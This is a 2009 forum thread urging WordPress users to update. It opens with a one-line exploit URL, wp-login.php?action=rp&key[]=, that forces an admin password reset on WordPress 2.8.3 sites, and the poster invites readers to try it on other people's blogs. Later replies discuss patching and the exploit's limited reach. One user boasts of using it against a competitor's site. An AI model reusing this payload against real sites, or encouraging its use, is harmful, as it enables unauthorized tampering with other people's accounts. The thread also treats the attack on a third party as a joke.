WEB Update your wordpress.

Discussion in 'OT Technology' started by Deviance, Aug 12, 2009.

  1. Deviance

    Deviance Can't you smell that smell? OT Supporter

    Joined:
    Jul 10, 2007
    Messages:
    4,988
    Likes Received:
    12
    Location:
    Rocky Mountain High
    http://www.darknet.org.uk/2009/08/wordpress-2-8-3-admin-reset-exploit/



    http://www.domain.com/wp-login.php?action=rp&key[]=

    Substitute a wordpress blogs url in to the one above and reset their admin password.


     
  2. Pepsi1975

    Pepsi1975 Mod of the Year

    Joined:
    Jan 6, 2005
    Messages:
    47,590
    Likes Received:
    1
    Location:
    Detroit
    went and ahead and updated all the sites that have wordpress on it, most of them did not have 2.8.3 on them anyways, but it did not hurt to update them
     
  3. Finest

    Finest OG #93

    Joined:
    Mar 16, 2000
    Messages:
    30,750
    Likes Received:
    35
    Location:
    Wisconsin. Seriously.
    So it's only for 2.8.3?
     
  4. Deviance

    Deviance Can't you smell that smell? OT Supporter

    Joined:
    Jul 10, 2007
    Messages:
    4,988
    Likes Received:
    12
    Location:
    Rocky Mountain High
    Not sure. The article says 2.8.3, but you could try it on an earlier install and see if it works.
     
  5. drpepper

    drpepper Active Member

    Joined:
    Nov 13, 2006
    Messages:
    38,076
    Likes Received:
    2
    Location:
    San Antonio
  6. Deviance

    Deviance Can't you smell that smell? OT Supporter

    Joined:
    Jul 10, 2007
    Messages:
    4,988
    Likes Received:
    12
    Location:
    Rocky Mountain High
    There are some vague references to them gaining control, but I also did not see how.

    Still, being locked out of your blog is a pain in the ass when you don't have direct access to the database to fix it.
     
  7. Finest

    Finest OG #93

    Joined:
    Mar 16, 2000
    Messages:
    30,750
    Likes Received:
    35
    Location:
    Wisconsin. Seriously.
    That reminds me, been needing to do a full backup soon. :o
     
  8. drpepper

    drpepper Active Member

    Joined:
    Nov 13, 2006
    Messages:
    38,076
    Likes Received:
    2
    Location:
    San Antonio
    tried it on mine and it sent me an email with the new password :dunno:
     
  9. Dr. Mike

    Dr. Mike Guest

    thanks :o i was planning on sticking with 2.8.3 for awhile :rofl:
     
  10. Insert Tokens

    Insert Tokens Making Cancer My Bitch OT Supporter

    Joined:
    Jan 12, 2006
    Messages:
    8,329
    Likes Received:
    75
    Location:
    Tasmania
    So much hype around this. The attacker has to have control of the admin account as well.. to get the new password. There's no way via this "hack" to manually define a password or gain access to the newly generated password. It's no different to using the "lost password" feature except that it bypasses the confirmation and you also don't need to know the admin's username/email..
     
  11. pharmokan

    pharmokan OT Supporter

    Joined:
    Oct 18, 2002
    Messages:
    102,175
    Likes Received:
    443
    Location:
    L.A.
    see what i mean

    wordpress is a fuckin joke
     
  12. 07

    07 18-1

    Joined:
    Jun 26, 2006
    Messages:
    4,933
    Likes Received:
    0
    Just used it on a competitor. Hope he freaks when he sees that email. LMAO
     
  13. illectronic

    illectronic I'm Coming Home OT Supporter

    Joined:
    Jan 19, 2005
    Messages:
    16,950
    Likes Received:
    0
    Location:
    Brooklyn
    Droopy ass pal is better then?
     
  14. crazybenf

    crazybenf Active Member

    Joined:
    Nov 14, 2001
    Messages:
    15,575
    Likes Received:
    2
    mine was fine unpatched.
     
  15. alwaysth

    alwaysth New Member

    Joined:
    May 14, 2005
    Messages:
    18,754
    Likes Received:
    0
    What do you use then?--
     
  16. CyberBullets

    CyberBullets I reach to the sky, and call out your name. If I c

    Joined:
    Nov 13, 2001
    Messages:
    11,865
    Likes Received:
    0
    Location:
    BC, Canada/Stockholm, Sweden
  17. alwaysth

    alwaysth New Member

    Joined:
    May 14, 2005
    Messages:
    18,754
    Likes Received:
    0
    Silverstripe logo apears every damn page you click, and says loading. Maybe that's just the demo but the Admin Panel isn't anything I found to be oustanding or better.-- I suppose you would say performance wise it's faster, but the demo was pretty damn sluggish. What are some reasons it's better than WP.
     

Share This Page